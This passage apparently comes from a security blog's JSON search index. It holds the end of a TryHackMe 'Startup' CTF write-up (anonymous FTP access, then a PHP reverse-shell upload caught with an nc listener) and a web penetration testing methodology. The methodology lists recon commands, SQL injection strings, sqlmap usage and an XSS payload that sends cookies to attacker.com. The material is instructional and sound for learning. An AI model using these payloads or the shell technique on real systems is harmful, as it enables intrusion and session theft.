class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# 80/tcp open http Apache 2.4.18\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"phase-2-ftp-anonymous-access\"\u003ePhase 2: FTP Anonymous Access\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp 10.10.X.X\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Username: anonymous\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Password: (empty)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp\u0026gt; ls -la\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Found: notice.txt, important.jpg\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp\u0026gt; get notice.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp\u0026gt; get important.jpg\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"phase-3-web-enumeration\"\u003ePhase 3: Web Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003egobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Found:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# /files (200) ← Shared with FTP!\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"phase-4-rce-via-php-shell-upload\"\u003ePhase 4: RCE via PHP Shell Upload\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Upload PHP reverse shell via FTP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp 10.10.X.X\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp\u0026gt; put shell.php\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Start listener\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enc -lvnp \u003cspan class=\"m\"\u003e4444\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Trigger shell via browser:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# http://10.10.X.X/files/shell.php\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cstrong\u003eWe have a shell!\u003c/strong\u003e\u003c/p\u003e","title":"TryHackMe — Startup | Full Writeup"},{"content":"Phase 1: Reconnaissance Reconnaissance is the foundation of any successful penetration test. The more information you gather, the higher your chances of finding vulnerabilities.\nPassive Recon — Without Touching the Target # DNS information gathering whois target.com dig target.com ANY subfinder -d target.com -o subdomains.txt # Google Dorks site:target.com filetype:pdf site:target.com inurl:admin site:target.com \u0026#34;index of /\u0026#34; # Shodan for infrastructure intel shodan search hostname:target.com Active Recon — Direct Scanning # Port and service scanning nmap -sV -sC -p- --min-rate 5000 -oN scan.txt target.com # Directory discovery ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 404 # Subdomain brute-forcing ffuf -u https://FUZZ.target.com -w subdomains.txt -fc 404 Phase 2: Enumeration After discovering the target, we dive deep into understanding the application.\nApplication Analysis Identify technologies in use (Wappalyzer, WhatWeb) Map all entry points (Login, Upload, API endpoints) Analyze JavaScript files for hidden endpoints Inspect HTTP headers for sensitive information leaks whatweb -a 3 https://target.com nikto -h https://target.com -ssl python3 LinkFinder.py -i https://target.com -d Phase 3: Vulnerability Discovery Top Vulnerabilities to Check (OWASP Top 10) Vulnerability Priority Tools SQL Injection 🔴 High sqlmap, manual XSS 🟡 Medium XSStrike, Dalfox SSRF 🔴 High Manual, Burp Suite IDOR 🟡 Medium Manual File Upload 🔴 High Manual SQL Injection — Manual Testing -- Basic tests \u0026#39; OR \u0026#39;1\u0026#39;=\u0026#39;1 \u0026#39; OR 1=1-- \u0026#39; UNION SELECT NULL,NULL,NULL-- -- Time-based blind \u0026#39;; WAITFOR DELAY \u0026#39;0:0:5\u0026#39;-- \u0026#39; AND SLEEP(5)-- Phase 4: Exploitation ⚠️ Warning: Only exploit systems you have explicit authorization to test.\n# SQL Injection with sqlmap sqlmap -u \u0026#34;https://target.com/page?id=1\u0026#34; --dbs --batch --level=5 # XSS cookie theft payload \u0026lt;script\u0026gt;fetch(\u0026#39;https://attacker.com/steal?c=\u0026#39;+document.cookie)\u0026lt;/script\u0026gt; Phase 5: Reporting A good report must include:\nExecutive Summary (non-technical, for management) Technical Details for each finding with CVSS score Proof of Concept steps Remediation Recommendations References and Resources ","permalink":"https://cyberah-blog.pages.dev/en/notes/methodology-web-pentest/","summary":"\u003ch2 id=\"phase-1-reconnaissance\"\u003ePhase 1: Reconnaissance\u003c/h2\u003e\n\u003cp\u003eReconnaissance is the foundation of any successful penetration test. The more information you gather, the higher your chances of finding vulnerabilities.\u003c/p\u003e\n\u003ch3 id=\"passive-recon--without-touching-the-target\"\u003ePassive Recon — Without Touching the Target\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# DNS information gathering\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ewhois target.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edig target.com ANY\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esubfinder -d target.com -o subdomains.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Google Dorks\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esite:target.com filetype:pdf\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esite:target.com inurl:admin\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esite:target.com \u003cspan class=\"s2\"\u003e\u0026#34;index of /\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Shodan for infrastructure intel\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eshodan search hostname:target.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"active-recon--direct-scanning\"\u003eActive Recon — Direct Scanning\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Port and service scanning\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sV -sC -p- --min-rate \u003cspan class=\"m\"\u003e5000\u003c/span\u003e -oN scan.txt target.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Directory discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003effuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc \u003cspan class=\"m\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Subdomain brute-forcing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003effuf -u https://FUZZ.target.com -w subdomains.txt -fc \u003cspan class=\"m\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"phase-2-enumeration\"\u003ePhase 2: Enumeration\u003c/h2\u003e\n\u003cp\u003eAfter discovering the target, we dive deep into understanding the application.\u003c/p\u003e","title":"Web Penetration Testing Methodology — Zero to Pwned"}]